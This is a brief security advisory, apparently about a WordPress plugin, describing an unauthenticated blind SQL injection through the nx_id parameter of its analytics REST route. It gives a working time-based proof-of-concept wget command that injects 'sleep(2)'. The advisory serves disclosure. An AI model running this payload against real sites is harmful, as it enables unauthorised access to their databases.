The plugin does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection
time wget 'https://example.com/?rest_route=/notificationx/v1/analytics' --post-data="nx_id=sleep(2) -- x" -q -O-